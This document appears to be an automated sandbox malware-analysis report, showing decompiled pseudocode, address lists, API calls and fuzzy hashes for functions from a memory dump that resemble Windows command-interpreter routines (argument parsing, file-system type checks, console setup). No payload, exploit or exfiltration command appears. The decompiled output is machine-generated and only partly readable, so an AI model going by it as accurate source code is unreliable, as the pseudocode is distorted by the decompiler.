																__eflags = _v228;
																if(_v228 == 0) {
																	L42:
																	__eflags = _v232;
																	if(_v232 != 0) {
																		_t115 = E0015D7D4(_t136,  *_t186);
																		__eflags = _t115;
																		if(_t115 != 0) {
																			break;
																		} else {
																			goto L43;
																		}
																	} else {
																		L43:
																		_t116 = _t186[1] & 0x0000ffff;
																		_t186 =  &(_t186[1]);
																		_t160 = _t116;
																		__eflags = _t116;
																		if(_t116 != 0) {
																			continue;
																		} else {
																		}
																	}
																} else {
																	__eflags = _t136;
																	if(_t136 == 0) {
																		goto L42;
																	} else {
																		_t118 = wcschr(_t136,  *_t186 & 0x0000ffff);
																		_t193 = _t193 + 8;
																		__eflags = _t118;
																		if(_t118 != 0) {
																			break;
																		} else {
																			goto L42;
																		}
																	}
																}
															} else {
																_t121 = wcschr( &_v216,  *_t186 & 0x0000ffff);
																_t193 = _t193 + 8;
																__eflags = _t121;
																if(_t121 != 0) {
																	goto L39;
																} else {
																	break;
																}
															}
															goto L22;
														}
														__eflags =  *_t186;
														if( *_t186 != 0) {
															__eflags = _v224;
															if(_v224 == 0) {
																__eflags = _v220;
																if(_v220 == 0) {
																	_t180 = _t180 + 2;
																	__eflags = _t180;
																}
															}
															_v220 = 1;
															goto L17;
														}
													}
												}
											} else {
												__eflags = _t136;
												if(_t136 == 0) {
													goto L28;
												} else {
													_t123 = wcschr(_t136,  *_t186 & 0x0000ffff);
													_t193 = _t193 + 8;
													__eflags = _t123;
													if(_t123 != 0) {
														goto L17;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										_t126 = wcschr( &_v216,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t126 != 0) {
											goto L24;
										} else {
											goto L17;
										}
									}
								}
							}
							L22:
							_t145 = _v236;
							_t180 = _t180 - _t145 >> 1;
							_t167 = 4 + _t180 * 2;
							if(E00160100(_t145, 4 + _t180 * 2) == 0) {
								E00179287(_t145);
								__imp__longjmp(0x18b8b8, 1);
								asm("int3");
								L102:
								_t169 = _t145 + 2;
								do {
									_t96 =  *_t145;
									_t145 = _t145 + 2;
									__eflags = _t96;
								} while (_t96 != 0);
								_t183 = _t180 + (_t145 - _t169 >> 1);
								L68:
								_t148 = _t183 + _t183;
								_t187 = E001600B0(_t183 + _t183);
								_v8 = _t187;
								__eflags = _t187;
								if(_t187 == 0) {
									E00179287(_t148);
									__imp__longjmp(0x18b8b8, 1);
									asm("int3");
									__eflags =  *0x18fa90;
									if( *0x18fa90 != 0) {
										E001782EB(_t148);
									}
									__eflags = 0;
									__eflags =  *0x18fa88;
									 *0x17d5c8 = 0;
									if( *0x18fa88 != 0) {
										E00178121(_t187, 0);
									}
									return _t187;
								}
								_t150 = _t136[0xf];
								__eflags = _t150;
								if(_t150 != 0) {
									E00161040(_t187, _t183, _t150);
								}
								_t104 = 0;
								__eflags = _t183;
								if(_t183 == 0) {
									L106:
									_t104 = 0x80070057;
								} else {
									__eflags = _t183 - 0x7fffffff;
									if(_t183 > 0x7fffffff) {
										goto L106;
									}
								}
								__eflags = _t104;
								if(_t104 < 0) {
									L109:
									_t172 = 0;
								} else {
									_t104 = 0;
									_t159 = _t183;
									_t173 = _t187;
									__eflags = _t183;
									if(_t183 == 0) {
										L108:
										_t104 = 0x80070057;
										goto L109;
									} else {
										while(1) {
											__eflags =  *_t173 - _t104;
											if( *_t173 == _t104) {
												break;
											}
											_t173 = _t173 + 2;
											_t159 = _t159 - 1;
											__eflags = _t159;
											if(_t159 != 0) {
												continue;
											} else {
												goto L108;
											}
											goto L114;
										}
										__eflags = _t159;
										if(_t159 == 0) {
											goto L108;
										} else {
											_t172 = _t183 - _t159;
											__eflags = _t172;
										}
									}
								}
								__eflags = _t104;
								if(_t104 >= 0) {
									_t113 = _v8 + _t172 * 2;
									_t190 = _t183 - _t172;
									__eflags = _t190;
									if(_t190 == 0) {
										L83:
										_t113 = _t113 - 2;
									} else {
										_t177 = _t172 + 0x7ffffffe + _t190 - _t183;
										_t183 = 0x18faa0 - _t113;
										__eflags = 0x18faa0;
										while(1) {
											__eflags = _t177;
											if(_t177 == 0) {
												break;
											}
											_t158 =  *(_t113 + _t183) & 0x0000ffff;
											__eflags = _t158;
											if(_t158 == 0) {
												break;
											} else {
												 *_t113 = _t158;
												_t177 = _t177 - 1;
												_t113 =  &(_t113[0]);
												_t190 = _t190 - 1;
												__eflags = _t190;
												if(_t190 != 0) {
													continue;
												} else {
													goto L83;
												}
											}
											goto L85;
										}
										__eflags = _t190;
										if(_t190 == 0) {
											goto L83;
										}
									}
									L85:
									_t187 = _v8;
									__eflags = 0;
									 *_t113 = 0;
								}
								_t136[0xf] = _t187;
								while(1) {
									L62:
									_t105 = E0015EEC8();
									__eflags = _t105;
									if(_t105 == 0) {
										break;
									}
									_t108 = E0015F030(1);
									__eflags = _t108 - 0x4000;
									if(_t108 == 0x4000) {
										_t145 = _t136[0xf];
										_t180 =  *0x18fa8c;
										__eflags = _t145;
										if(_t145 != 0) {
											goto L102;
										}
										goto L68;
									} else {
										_t188 = _v12;
										_t109 = E001602B0(_t136, _t188, _t183, _t188);
										__eflags = _t109;
										if(_t109 != 0) {
											_t110 =  *_t188;
											do {
												_t69 = _t110 + 0x14; // 0x14
												_t137 = _t69;
												_t110 =  *_t137;
												_v12 = _t137;
												__eflags = _t110;
											} while (_t110 != 0);
											_t136 = _v20;
											continue;
										} else {
											__eflags = 0;
											E0015F300(_t109, 0, 0, _t109);
										}
									}
									break;
								}
								_t136[0xd] = _v16;
								return _t136;
							} else {
								L23:
								return E00166FD0(_t75, _t136, _v12 ^ _t191, _t167, _t180, _t186);
							}
						}
					}
				}
				goto L114;
			}














































































                                  0x0015ea40
                                  0x0015ea40
                                  0x0015ea4b
                                  0x0015ea52
                                  0x0015ea57
                                  0x0015ea59
                                  0x0015ea5e
                                  0x0015ed52
                                  0x0015ed57
                                  0x0015ed5c
                                  0x0015ed5e
                                  0x00000000
                                  0x0015ed64
                                  0x0016c03d
                                  0x0016c049
                                  0x00000000
                                  0x0016c049
                                  0x0015ea64
                                  0x0015ea64
                                  0x0015ea64
                                  0x0015ea67
                                  0x0015ea67
                                  0x0015ea6a
                                  0x0015ea6d
                                  0x0015ea76
                                  0x0015ea7d
                                  0x0015ea82
                                  0x0015ea8a
                                  0x0016c04f
                                  0x0016c04f
                                  0x0016c05b
                                  0x00000000
                                  0x0015ea90
                                  0x0015ea90
                                  0x0015ea96
                                  0x0015ea9b
                                  0x0015ea9d
                                  0x0015eaa3
                                  0x0015eaa3
                                  0x0015eaa6
                                  0x0015eaaf
                                  0x00000000
                                  0x00000000
                                  0x0015eab3
                                  0x0015ead0
                                  0x0015ead0
                                  0x0015ead8
                                  0x0015ead9
                                  0x0015eab5
                                  0x0015eab7
                                  0x0015eabd
                                  0x0015eac2
                                  0x0015eac8
                                  0x0015eaca
                                  0x00000000
                                  0x0015eaca
                                  0x0015eac8
                                  0x0015eadf
                                  0x0015eae5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015eae5
                                  0x0015eae7
                                  0x0015eaed
                                  0x0015eaf4
                                  0x0015ed75
                                  0x0015ed7a
                                  0x0015ed7b
                                  0x0015ed7c
                                  0x0015ed7d
                                  0x0015ed7e
                                  0x0015ed7f
                                  0x0015ed82
                                  0x0015ed88
                                  0x0015ed89
                                  0x0015ed8d
                                  0x0015ed94
                                  0x0015ed95
                                  0x0015ed97
                                  0x0015ed9f
                                  0x0015eda1
                                  0x00000000
                                  0x0015eafa
                                  0x0015eafc
                                  0x0015eb06
                                  0x0015eb0e
                                  0x0015eb11
                                  0x0015eb1e
                                  0x0015eb24
                                  0x0015eb26
                                  0x0015eb2a
                                  0x0015eb5a
                                  0x0015eb5a
                                  0x0015eb66
                                  0x0015eb7e
                                  0x0015eb81
                                  0x0015eb84
                                  0x0015eb8b
                                  0x0015ecf0
                                  0x0015ecf0
                                  0x0015ecf4
                                  0x0015ecf6
                                  0x0015ecf9
                                  0x0015ecfc
                                  0x0015ecff
                                  0x0015ed02
                                  0x0015ed05
                                  0x00000000
                                  0x00000000
                                  0x0015ed07
                                  0x0015ed0a
                                  0x00000000
                                  0x0015ed10
                                  0x0015ed10
                                  0x0015ed15
                                  0x00000000
                                  0x0015ed17
                                  0x00000000
                                  0x0015ed17
                                  0x0015ed15
                                  0x00000000
                                  0x0015ed0a
                                  0x0015ed6e
                                  0x0015ed6e
                                  0x0015eb91
                                  0x0015eb91
                                  0x0015eb68
                                  0x0015eb6d
                                  0x0015eb73
                                  0x0015eb78
                                  0x0015eccd
                                  0x0015ecd0
                                  0x0015ecd2
                                  0x0015ed1c
                                  0x0015ed23
                                  0x0015ed26
                                  0x0015ed69
                                  0x0015ed69
                                  0x0015ed28
                                  0x0015ed2e
                                  0x0015ed38
                                  0x0015ecd4
                                  0x0015ecd4
                                  0x0015ecd6
                                  0x0016c092
                                  0x0016c092
                                  0x0015ecdc
                                  0x0015ece6
                                  0x0015ece6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015eb78
                                  0x0015eb9b
                                  0x0015eb9f
                                  0x0015eba2
                                  0x0015eba7
                                  0x00000000
                                  0x00000000
                                  0x0015eb2c
                                  0x0015eb2d
                                  0x0015eb33
                                  0x0015eb38
                                  0x0015ebde
                                  0x0015ebde
                                  0x0015ebe1
                                  0x0015ebe3
                                  0x0015ed40
                                  0x0015ed47
                                  0x00000000
                                  0x0015ed4d
                                  0x00000000
                                  0x0015ed4d
                                  0x0015ebe9
                                  0x0015ebe9
                                  0x0015ebe9
                                  0x0015ebe9
                                  0x0015ebec
                                  0x0015ebf2
                                  0x0015ec0e
                                  0x0015ec11
                                  0x0015ec11
                                  0x0015ec14
                                  0x0015ec1a
                                  0x0016c061
                                  0x0016c066
                                  0x0016c06b
                                  0x0016c06d
                                  0x00000000
                                  0x0016c073
                                  0x00000000
                                  0x0016c073
                                  0x0015ec20
                                  0x0015ec20
                                  0x0015ec20
                                  0x0015ec23
                                  0x0015ec26
                                  0x0015ec28
                                  0x0015ec30
                                  0x0015ec30
                                  0x0015ec34
                                  0x00000000
                                  0x00000000
                                  0x0015ec37
                                  0x0015ec3d
                                  0x0015ec40
                                  0x0015ec42
                                  0x0015ec8a
                                  0x0015ec8a
                                  0x0015ec91
                                  0x0015eca9
                                  0x0015eca9
                                  0x0015ecb0
                                  0x0016c07d
                                  0x0016c082
                                  0x0016c084
                                  0x00000000
                                  0x0016c08a
                                  0x00000000
                                  0x0016c08a
                                  0x0015ecb6
                                  0x0015ecb6
                                  0x0015ecb6
                                  0x0015ecba
                                  0x0015ecbd
                                  0x0015ecbf
                                  0x0015ecc2
                                  0x00000000
                                  0x00000000
                                  0x0015ecc8
                                  0x0015ecc2
                                  0x0015ec93
                                  0x0015ec93
                                  0x0015ec95
                                  0x00000000
                                  0x0015ec97
                                  0x0015ec9c
                                  0x0015eca2
                                  0x0015eca5
                                  0x0015eca7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015eca7
                                  0x0015ec95
                                  0x0015ec44
                                  0x0015ec4f
                                  0x0015ec55
                                  0x0015ec58
                                  0x0015ec5a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015ec5a
                                  0x00000000
                                  0x0015ec42
                                  0x0015ec5c
                                  0x0015ec60
                                  0x0015ec66
                                  0x0015ec6d
                                  0x0015ec6f
                                  0x0015ec76
                                  0x0015ec78
                                  0x0015ec78
                                  0x0015ec78
                                  0x0015ec76
                                  0x0015ec7b
                                  0x00000000
                                  0x0015ec7b
                                  0x0015ec60
                                  0x0015ec26
                                  0x0015ebf4
                                  0x0015ebf4
                                  0x0015ebf6
                                  0x00000000
                                  0x0015ebf8
                                  0x0015ebfd
                                  0x0015ec03
                                  0x0015ec06
                                  0x0015ec08
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015ec08
                                  0x0015ebf6
                                  0x0015ebf2
                                  0x0015eb3e
                                  0x0015eb49
                                  0x0015eb4f
                                  0x0015eb54
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015eb54
                                  0x0015eb38
                                  0x0015eb2a
                                  0x0015ebad
                                  0x0015ebad
                                  0x0015ebb5
                                  0x0015ebb7
                                  0x0015ebc5
                                  0x0016c09a
                                  0x0016c0a6
                                  0x0016c0ac
                                  0x0016c0ad
                                  0x0016c0ad
                                  0x0016c0b0
                                  0x0016c0b0
                                  0x0016c0b3
                                  0x0016c0b6
                                  0x0016c0b6
                                  0x0016c0bf
                                  0x0015edfa
                                  0x0015edfa
                                  0x0015ee02
                                  0x0015ee04
                                  0x0015ee07
                                  0x0015ee09
                                  0x0016c0f7
                                  0x0016c103
                                  0x0016c109
                                  0x0016c10a
                                  0x0016c111
                                  0x0016c117
                                  0x0016c117
                                  0x0015efe1
                                  0x0015efe3
                                  0x0015efea
                                  0x0015efef
                                  0x0016c125
                                  0x0016c125
                                  0x00000000
                                  0x0015eff5
                                  0x0015ee0f
                                  0x0015ee12
                                  0x0015ee14
                                  0x0016c0cb
                                  0x0016c0cb
                                  0x0015ee1a
                                  0x0015ee1c
                                  0x0015ee1e
                                  0x0016c0d5
                                  0x0016c0d5
                                  0x0015ee24
                                  0x0015ee24
                                  0x0015ee2a
                                  0x00000000
                                  0x00000000
                                  0x0015ee2a
                                  0x0015ee30
                                  0x0015ee32
                                  0x0016c0f0
                                  0x0016c0f0
                                  0x0015ee38
                                  0x0015ee38
                                  0x0015ee3a
                                  0x0015ee3c
                                  0x0015ee3e
                                  0x0015ee40
                                  0x0016c0eb
                                  0x0016c0eb
                                  0x00000000
                                  0x0015ee46
                                  0x0015ee46
                                  0x0015ee46
                                  0x0015ee49
                                  0x00000000
                                  0x00000000
                                  0x0016c0df
                                  0x0016c0e2
                                  0x0016c0e2
                                  0x0016c0e5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016c0e5
                                  0x0015ee4f
                                  0x0015ee51
                                  0x00000000
                                  0x0015ee57
                                  0x0015ee59
                                  0x0015ee59
                                  0x0015ee59
                                  0x0015ee51
                                  0x0015ee40
                                  0x0015ee5b
                                  0x0015ee5d
                                  0x0015ee64
                                  0x0015ee67
                                  0x0015ee67
                                  0x0015ee69
                                  0x0015ee99
                                  0x0015ee99
                                  0x0015ee6b
                                  0x0015ee7a
                                  0x0015ee7c
                                  0x0015ee7c
                                  0x0015ee80
                                  0x0015ee80
                                  0x0015ee82
                                  0x00000000
                                  0x00000000
                                  0x0015ee84
                                  0x0015ee88
                                  0x0015ee8b
                                  0x00000000
                                  0x0015ee8d
                                  0x0015ee8d
                                  0x0015ee90
                                  0x0015ee91
                                  0x0015ee94
                                  0x0015ee94
                                  0x0015ee97
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015ee97
                                  0x00000000
                                  0x0015ee8b
                                  0x0015ee9e
                                  0x0015eea0
                                  0x00000000
                                  0x00000000
                                  0x0015eea0
                                  0x0015eea2
                                  0x0015eea2
                                  0x0015eea5
                                  0x0015eea7
                                  0x0015eea7
                                  0x0015eeaa
                                  0x0015eda4
                                  0x0015eda4
                                  0x0015eda4
                                  0x0015eda9
                                  0x0015edab
                                  0x00000000
                                  0x00000000
                                  0x0015edb2
                                  0x0015edb7
                                  0x0015edbc
                                  0x0015ede9
                                  0x0015edec
                                  0x0015edf2
                                  0x0015edf4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015edbe
                                  0x0015edbe
                                  0x0015edc3
                                  0x0015edc8
                                  0x0015edca
                                  0x0015eeb2
                                  0x0015eeb4
                                  0x0015eeb4
                                  0x0015eeb4
                                  0x0015eeb7
                                  0x0015eeb9
                                  0x0015eebc
                                  0x0015eebc
                                  0x0015eec0
                                  0x00000000
                                  0x0015edd0
                                  0x0015edd3
                                  0x0015edd5
                                  0x0015edd5
                                  0x0015edca
                                  0x00000000
                                  0x0015edbc
                                  0x0015edde
                                  0x0015ede8
                                  0x0015ebcb
                                  0x0015ebcb
                                  0x0015ebdb
                                  0x0015ebdb
                                  0x0015ebc5
                                  0x0015eaf4
                                  0x0015ea8a
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: wcschr$iswspacelongjmp
                                  • String ID: =,;
                                  • API String ID: 4008636219-1539845467
                                  • Opcode ID: d319e049e2307d92e58527f77d5fb1bd7ea46d1b3235275595a267ce8a4f1eed
                                  • Instruction ID: d7ba5f0739d252efbefa7266840d7c9355f663c23e952941faf4352e57e0bd95
                                  • Opcode Fuzzy Hash: d319e049e2307d92e58527f77d5fb1bd7ea46d1b3235275595a267ce8a4f1eed
                                  • Instruction Fuzzy Hash: 6BD1E275E00211CBDB2C9F68CD457BA72F5EF54306F14446AEC6AAF241EB718E88CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017B9D3, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 42%
                                  			E0017B9D3(void* __ecx, char __edx, char _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				char _v1085;
				long _v1092;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				void* _t63;
				WCHAR* _t64;
				int _t65;
				WCHAR* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				WCHAR* _t73;
				WCHAR* _t81;
				void* _t89;
				WCHAR* _t90;
				signed int _t91;

				_t88 = __edx;
				_t41 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t41 ^ _t91;
				_v1085 = __edx;
				_t90 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t73 = 1;
				_t89 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				if(E00160C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00160C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L27:
					_t90 = _t73;
					goto L28;
				} else {
					_t63 = _v564;
					if(_t63 == 0) {
						_t63 =  &_v1084;
					}
					__imp__GetVolumePathNameW(_t89, _t63, _v556);
					if(_t63 == 0) {
						goto L27;
					} else {
						_t64 = _v564;
						if(_t64 == 0) {
							_t64 =  &_v1084;
						}
						_t65 = GetDriveTypeW(_t64);
						if(_t65 == 0 || _t65 == 4) {
							_t73 = _t90;
							goto L27;
						} else {
							_t66 = _v28;
							if(_t66 == 0) {
								_t66 =  &_v548;
							}
							_t81 = _v564;
							if(_t81 == 0) {
								_t81 =  &_v1084;
							}
							if(GetVolumeInformationW(_t81, _t90, _t90, _t90,  &_v1092,  &_v1092, _t66, _v20) == 0) {
								goto L27;
							} else {
								_t69 = _v28;
								if(_t69 == 0) {
									_t69 =  &_v548;
								}
								__imp___wcsicmp(_t69, L"NTFS");
								if(_t69 != 0) {
									if(_a4 == 0) {
										L21:
										if(_v1085 == 0) {
											L28:
											_t73 = _t90;
										} else {
											_t70 = _v28;
											if(_t70 == 0) {
												_t70 =  &_v548;
											}
											__imp___wcsicmp(_t70, L"CSVFS");
											if(_t70 != 0) {
												goto L28;
											} else {
											}
										}
									} else {
										_t71 = _v28;
										if(_t71 == 0) {
											_t71 =  &_v548;
										}
										__imp___wcsicmp(_t71, L"REFS");
										if(_t71 != 0) {
											goto L21;
										}
									}
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v564);
				__imp__??_V@YAXPAX@Z();
				return E00166FD0(_t73, _t73, _v8 ^ _t91, _t88, _t89, _t90, _v28);
			}






























                                  0x0017b9d3
                                  0x0017b9de
                                  0x0017b9e5
                                  0x0017b9f0
                                  0x0017b9f7
                                  0x0017b9f9
                                  0x0017b9fe
                                  0x0017ba07
                                  0x0017ba0a
                                  0x0017ba0c
                                  0x0017ba0f
                                  0x0017ba17
                                  0x0017ba22
                                  0x0017ba28
                                  0x0017ba37
                                  0x0017ba60
                                  0x0017bb85
                                  0x0017bb85
                                  0x00000000
                                  0x0017ba90
                                  0x0017ba90
                                  0x0017ba98
                                  0x0017ba9a
                                  0x0017ba9a
                                  0x0017baa8
                                  0x0017bab0
                                  0x00000000
                                  0x0017bab6
                                  0x0017bab6
                                  0x0017babe
                                  0x0017bac0
                                  0x0017bac0
                                  0x0017bac7
                                  0x0017bacf
                                  0x0017bb83
                                  0x00000000
                                  0x0017bade
                                  0x0017bade
                                  0x0017bae3
                                  0x0017bae5
                                  0x0017bae5
                                  0x0017baeb
                                  0x0017baf3
                                  0x0017baf5
                                  0x0017baf5
                                  0x0017bb13
                                  0x00000000
                                  0x0017bb15
                                  0x0017bb15
                                  0x0017bb1a
                                  0x0017bb1c
                                  0x0017bb1c
                                  0x0017bb28
                                  0x0017bb32
                                  0x0017bb38
                                  0x0017bb59
                                  0x0017bb60
                                  0x0017bb87
                                  0x0017bb87
                                  0x0017bb62
                                  0x0017bb62
                                  0x0017bb67
                                  0x0017bb69
                                  0x0017bb69
                                  0x0017bb75
                                  0x0017bb7f
                                  0x00000000
                                  0x00000000
                                  0x0017bb81
                                  0x0017bb7f
                                  0x0017bb3a
                                  0x0017bb3a
                                  0x0017bb3f
                                  0x0017bb41
                                  0x0017bb41
                                  0x0017bb4d
                                  0x0017bb57
                                  0x00000000
                                  0x00000000
                                  0x0017bb57
                                  0x0017bb38
                                  0x0017bb32
                                  0x0017bb13
                                  0x0017bacf
                                  0x0017bab0
                                  0x0017bb8f
                                  0x0017bb99
                                  0x0017bbb2

                                  APIs
                                  • memset.MSVCRT ref: 0017BA0F
                                  • memset.MSVCRT ref: 0017BA37
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0017BAA8
                                  • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0017BAC7
                                  • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0017BB0B
                                  • _wcsicmp.MSVCRT ref: 0017BB28
                                  • _wcsicmp.MSVCRT ref: 0017BB4D
                                  • _wcsicmp.MSVCRT ref: 0017BB75
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0017BB8F
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0017BB99
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                  • String ID: CSVFS$NTFS$REFS
                                  • API String ID: 3510147486-2605508654
                                  • Opcode ID: 2d26afb9d3c2b972d07f932af320a90f1758c916b994f4938c25b12fe94a07cc
                                  • Instruction ID: d23843de0996d4e11ea48f21c10cb96e34648ebf22318ace53dc4363819ce5b3
                                  • Opcode Fuzzy Hash: 2d26afb9d3c2b972d07f932af320a90f1758c916b994f4938c25b12fe94a07cc
                                  • Instruction Fuzzy Hash: 99513671A042199BDF21DBB5DCC5BEABBB8EB14354F0440AAF909D3141DB34DE94CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00159520, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmp
                                  • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                  • API String ID: 2081463915-3124875276
                                  • Opcode ID: 27865a7bbdeca5a3502c6d983a2b87611f38aaf9a7c7549bbef0068ab1341a9d
                                  • Instruction ID: b50e256437245e82c20313e824afcb4fd7eb4cedf5d70ae5bf9894b5266120da
                                  • Opcode Fuzzy Hash: 27865a7bbdeca5a3502c6d983a2b87611f38aaf9a7c7549bbef0068ab1341a9d
                                  • Instruction Fuzzy Hash: 99413732200702CAE7296F34E85566A77B5EB15722F10002FE9368F5D1FF72868DC712
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001606C0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 21%
                                  			E001606C0(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;
				void* _t16;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t28;
				signed int _t29;
				void* _t30;
				void* _t32;

				_t4 =  *0x17d0b4; // 0x3dd0c51d
				_t5 = _t4 ^ _t29;
				_v8 = _t5;
				__imp___get_osfhandle( *0x183880, __ecx);
				_t6 = SetConsoleMode(_t5, 1);
				__imp___get_osfhandle(0x183880);
				_t32 = _t30 + 8;
				_t7 = GetConsoleMode(_t6, 1);
				if(_t7 == 0) {
					L2:
					__imp___get_osfhandle(0x183884);
					if(GetConsoleMode(_t7, 0) != 0) {
						_t20 =  *0x183884;
						_t8 = _t20 & 0x00000017;
						if(_t8 != 7) {
							_t23 = _t20 & 0xffffffef | 0x00000007;
							 *0x183884 = _t23;
							__imp___get_osfhandle(_t23);
							_t8 = SetConsoleMode(_t8, 0);
						}
						_push(_t27);
						_t28 =  *0x183888;
						if(_t28 != 0) {
							 *0x1994b4(L"CMD.EXE");
							_t8 =  *_t28();
						}
						_pop(_t27);
					}
					return E00166FD0(_t8, _t16, _v8 ^ _t29, _t25, _t26, _t27);
				}
				_t24 =  *0x17d0e0; // 0x7
				_t25 =  *0x183880;
				_t7 = _t24 & _t25;
				if(_t7 != _t24) {
					_t25 = _t25 | _t24;
					 *0x183880 = _t25;
					__imp___get_osfhandle(_t25);
					_t32 = _t32 + 4;
					_t7 = SetConsoleMode(_t7, 1);
					if(_t7 != 0) {
						goto L2;
					}
					_t7 =  *0x17d0e0; // 0x7
					if((_t7 & 0x00000004) != 0) {
						 *0x17d0e0 = _t7 & 0xfffffffb;
						_t15 =  *0x183880 & 0xfffffffb;
						 *0x183880 = _t15;
						__imp___get_osfhandle(_t15);
						_t32 = _t32 + 4;
						_t7 = SetConsoleMode(_t15, 1);
					}
				}
				goto L2;
			}





















                                  0x001606c6
                                  0x001606cb
                                  0x001606cd
                                  0x001606d8
                                  0x001606e2
                                  0x001606ef
                                  0x001606f5
                                  0x001606f9
                                  0x00160701
                                  0x00160717
                                  0x0016071e
                                  0x00160730
                                  0x00160732
                                  0x0016073a
                                  0x0016073f
                                  0x00160744
                                  0x0016074a
                                  0x00160750
                                  0x0016075a
                                  0x0016075a
                                  0x00160760
                                  0x00160761
                                  0x00160769
                                  0x00160772
                                  0x00160778
                                  0x00160778
                                  0x0016077a
                                  0x0016077a
                                  0x00160788
                                  0x00160788
                                  0x00160703
                                  0x0016070b
                                  0x00160711
                                  0x00160715
                                  0x00160789
                                  0x0016078e
                                  0x00160794
                                  0x0016079a
                                  0x0016079e
                                  0x001607a6
                                  0x00000000
                                  0x00000000
                                  0x0016cc03
                                  0x0016cc0a
                                  0x0016cc13
                                  0x0016cc1d
                                  0x0016cc23
                                  0x0016cc28
                                  0x0016cc2e
                                  0x0016cc32
                                  0x0016cc32
                                  0x0016cc0a
                                  0x00000000

                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 001606D8
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001738A5), ref: 001606E2
                                  • _get_osfhandle.MSVCRT ref: 001606EF
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001606F9
                                  • _get_osfhandle.MSVCRT ref: 0016071E
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00160728
                                  • _get_osfhandle.MSVCRT ref: 00160750
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0016075A
                                  • _get_osfhandle.MSVCRT ref: 00160794
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0016079E
                                  • _get_osfhandle.MSVCRT ref: 0016CC28
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0016CC32
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
